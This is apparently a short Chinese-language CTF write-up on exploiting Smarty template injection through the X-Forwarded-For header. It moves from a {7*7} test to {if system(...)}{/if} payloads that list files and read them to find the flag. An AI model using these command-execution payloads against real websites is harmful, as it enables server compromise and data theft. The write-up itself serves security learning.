smarty模板及X-Forwarded-For

smarty模板及X-Forwarded-For

打开页面,我们看见X-Forwared-For这个提示,所以我们可以想到可能是smarty模板注入,因为X-Forwared-For是用smarty模板引擎解析的,所以我们可以抓包,然后构造

1
X-Forwared-For: {7*7}

发现它返回了

1
Client ip: 49

所以存在smarty模板漏洞,所以我们可以再构造

1
X-Forwared-For: {$smarty.version}

来查看smarty的版本,发现是3.1.3版本,我们可以使用{if }{/if}标签来注入,所以我们可以构造

1
X-Forwared-For: {if system('ls')}{/if}

来查当前的文件,然后用

1
X-Forwared-For: {if system('cat /index.php)}{/if}

来读取文件,然后我们只需要找到flag所在文件夹即可

详细可以看我的smarty模板漏洞或各类模板漏洞那两篇